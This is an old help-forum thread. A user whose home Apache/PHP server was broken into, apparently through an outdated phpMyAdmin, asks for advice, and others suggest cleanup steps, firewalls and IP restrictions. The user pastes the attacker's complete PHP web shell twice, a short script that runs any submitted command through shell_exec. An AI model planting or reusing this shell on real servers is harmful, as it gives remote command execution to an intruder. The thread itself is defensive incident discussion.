FRIHOSTFORUMSFAQTOSBLOGSDIRECTORY
You are invited to Log in or Register a Frihost Account!

Problem with hacking my computer

   Frihost Forum Index -> Computers -> Computer Problems and Support
 


JayBee
My problem is to find the hole in my computer. Some hacker used my running apache with php to hack my computer, when i was debuging my web pages. He save the script called sh3ll.php in my http root directory and he executes commands, he want Crying or Very sad like stop firewall, tftp, start his ftp.
I have windows XP home, apache 2.0.55, php 5.1.2 and phpmyadmin

I have suspection, that he go throw phpmyadmin (I find some activity in apache log)

Could somebody help me?

(I want to find the hole, i dont want to disable apache in firewall for public use, because I want it)
devroom
dont know really what you mean, but restart the computer in safe mode.
Run a virusscan and change settings.
But the most importent thing; remove the bad file

Hope it will work Wink
TheGeek
sounds like you just need to go into apache while in safemode and NOT HOOKED UP TO THE INTERNET!!!! and just remove that file, that will make sure that he isnt trying to execute anything and it wont start up when the computer does because its safe mode. It probably wouldnt be a bad idea to run a virus scan while your in there, but from the sounds of it its probably not neccesary. Also change all your passwords and stuff, that way any data that he has collected while he is on your computer is useless to him. Another good thing to do when running a server off a personal computer of your own is to make sure your behind a good bit of firewall protection. Make sure that ports are blocked on your router and make sure that if there is any kind of software firewall running on your machine that you use that to block a bunch of ports as well.

The best idea would be to not run a server on a winXP home computer to start with however. By nature, its insecure and making it a server is probably not the wisest thing. If your gunna run a server, use either win 2003, 2000 or some distro of linux if you really want security....
Nyizsa
Sorry for being a bit off-topic:
I run Linux (Debian) on my computer, with Apache installed. And it works as a server also. (However I don't use it as one.) I took a Shields UP! test (which I recommend for all of you - especially Windows users), and it identified some security issues. But all of them were like "On Windows it can lead to..." "Due to a security flaw in Windows..." and so on.
My question is: do I need to install any security software? A firewall or something? Or am I safe?
JayBee
There is no virus, because, I have good antivirus, with auto virus deleting. But the hacker was stupid when he stop the firewall, because windows bubble sistem said me thah computer is beeing hacked Smile so I whip out LAN cable and I start watching for the problem.

He only upload the file with this content. It is so silly, but it works well.


Code:
<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF" onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><input type=TEXT name="-cmd" size=64 value="<?$cmd?>" style="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>


and the same with spaces

Code:
<? $cmd = $_REQUEST["-cmd"]; ?>
<html>
    <head>
        <title>SH3LL</title>
    </head>
    <body bgcolor=#000000 text=#FFFFFF" onLoad="document.forms[0].elements[-cmd].focus()">
        <form method=POST>
            <input type=TEXT name="-cmd" size=64 value="<?$cmd?>" style="background:#000000;color:#FFFFFF;">
            <pre><? if ($cmd != "") print Shell_Exec($cmd); ?></pre>
        </form>
    </body>
</html>



and i thing, that it isn't virus Very Happy

I cant use other windows, becouse I don't have them, I bought my laptop with win xp hom and I don't wont to do anything with them, because I want to run some "only windows programs" and I don't have a time to play with wine in Linux.
devroom
so a stupid hacker Very Happy
MonkeyWrench
buy norton internet security, the firewall on it is brilliant, i used to get hacked so much but then it stopped everything.
JayBee
I only once install "norton internet security" and it was horible exipirience.
Ok, it stops hackers from infiltrate them to my computer, but it also stops all my wark. Sad
I have sempron @ 1600MHz. The slowdown was so radical.
It works like my pentium mmx @ 266MHz that i have without firewall and antivirus.
(boot time, copying files, time of starting same applications, ... all was almost same)


Hard times for computing.
steveadams617
You can limit which IP addresses can come in on apache. Just make it so that only localhost 127.0.0.1 can come in:

http://httpd.apache.org/docs/1.3/mod/mod_access.html
JayBee
Exactly, it is something, that can solve my problem
.htacces with allow/deny Idea

I was googling for this problem, and I found, that i have old phpMyAdmin with this security hole: Local file inclusion vulnerability

So what am I? ............ I'm stupid. Laughing
Reply to topic    Frihost Forum Index -> Computers -> Computer Problems and Support

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2007 Frihost, forums powered by phpBB.